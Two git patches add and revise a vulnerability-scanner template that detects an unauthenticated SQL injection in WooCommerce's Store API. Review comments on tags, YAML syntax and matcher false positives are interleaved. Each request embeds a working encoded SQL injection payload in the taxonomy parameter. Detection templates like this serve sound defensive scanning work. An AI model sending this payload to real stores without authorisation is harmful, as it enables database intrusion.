From ede6df8fa4253c93aa04a619951592d3f8665e0b Mon Sep 17 00:00:00 2001
From: rootxharsh
Date: Thu, 15 Jul 2021 17:02:19 +0000
Subject: [PATCH 1/2] Add WooCommerce SQLi Template
---
 .../wordpress/wordpress-woocommerce-sqli.yaml | 23 +++++++++++++++++++
 1 file changed, 23 insertions(+)
 create mode 100644 vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml
diff --git a/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml b/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml
new file mode 100644
index 0000000000..c1219606b5
--- /dev/null
+++ b/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml
@@ -0,0 +1,23 @@
+id: wordpress-woocommerce-sqli
+
+info:
+ name: WordPress Woocommerce Plugin
+ author: @rootxharsh @iamnoooob @S1r1u5_
+ severity: critical
+ tags: wordpress,woocomernce
+
+
+requests:
+ - raw:
+ - |
+ GET /wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=aa%252522%252529or%2525201%25253D1%252523&attributes[0][taxonomy]=11 HTTP/1.1
+ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
+ - |
+ GET /?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=aa%252522%252529or%2525201%25253D1%252523&attributes[0][taxonomy]=11 HTTP/1.1
+ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
+
+ req-condition: true
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains(tolower(all_headers), "application/json") && contains(body_1, "{\"term\":") || contains(body_2, "{\"term\":")'
From 382534fedc3d63b1b7dc90bebbed4de3f3de1767 Mon Sep 17 00:00:00 2001
From: sandeep
Date: Thu, 15 Jul 2021 22:58:43 +0530
Subject: [PATCH 2/2] Update wordpress-woocommerce-sqli.yaml
---
 .../wordpress/wordpress-woocommerce-sqli.yaml | 34 ++++++++++++++-----
 1 file changed, 25 insertions(+), 9 deletions(-)
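Review bot: `tags: wordpress,woocomernce` misspells the plugin name, and since tag-based template selection presumably matches the literal string, a `woocommerce` tag filter would not pick this template up; it should read `tags: wordpress,woocommerce`. The PATCH 2/2 hunk carries the same misspelling forward in `tags: wordpress,woocomernce,sqli`. The two consecutive blank lines before `requests:` are also one more than the file uses between its other stanzas.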
diff --git a/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml b/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml
index c1219606b5..d8a10190c6 100644
--- a/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml
+++ b/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml
@@ -1,23 +1,39 @@
 id: wordpress-woocommerce-sqli
 info:
- name: WordPress Woocommerce Plugin
- author: @rootxharsh @iamnoooob @S1r1u5_
+ name: Unauthenticated SQL injection Woocommerce
+ author: rootxharsh,iamnoooob,S1r1u5_,cookiehanhoan
 severity: critical
- tags: wordpress,woocomernce
+ tags: wordpress,woocomernce,sqli
+ reference: |
+ - https://woocommerce.com/posts/critical-vulnerability-detected-july-2021
+ - https://viblo.asia/p/phan-tich-loi-unauthen-sql-injection-woocommerce-naQZRQyQKvx
 requests:
 - raw:
 - |
 GET /wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=aa%252522%252529or%2525201%25253D1%252523&attributes[0][taxonomy]=11 HTTP/1.1
- User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
+ {{Hostname}}
+
+ - |
 GET /?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=aa%252522%252529or%2525201%25253D1%252523&attributes[0][taxonomy]=11 HTTP/1.1
- User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
+ {{Hostname}}
- req-condition: true
+ matchers-condition: and
 matchers:
- - type: dsl
- dsl:
- - 'contains(tolower(all_headers), "application/json") && contains(body_1, "{\"term\":") || contains(body_2, "{\"term\":")'
+ - type: word
+ words:
+ - '"term":'
+ - '"count":'
+ part: body
+ condition: and
+
+ - type: word
+ words:
+ - 'application/json'
+ part: header
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
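Review bot: `reference: |` turns the two URLs into one block-scalar string whose content is the literal text `- https://…` on two lines rather than a YAML sequence of two links, so a consumer that expects a list of references (or renders them as links) gets a single string with leading dashes; drop the `|` and indent the entries as a sequence: `reference:` / `  - https://woocommerce.com/posts/critical-vulnerability-detected-july-2021` / `  - https://viblo.asia/p/phan-tich-loi-unauthen-sql-injection-woocommerce-naQZRQyQKvx`. The bare `{{Hostname}}` line that replaces the User-Agent header in both raw requests is not a header line at all; the conventional form, which also makes the request correct against a name-based virtual host, is `Host: {{Hostname}}` — worth confirming how the raw-request parser treats a line without a colon before relying on it. The word matcher on `"term":` and `"count":` combined with `application/json` and status 200 presupposes that a fixed installation returns no attribute counts for this query, so the template should be checked against a patched version to rule out false positives, since the endpoint itself is a legitimate public API. The file also ends without a trailing newline (`\ No newline at end of file`).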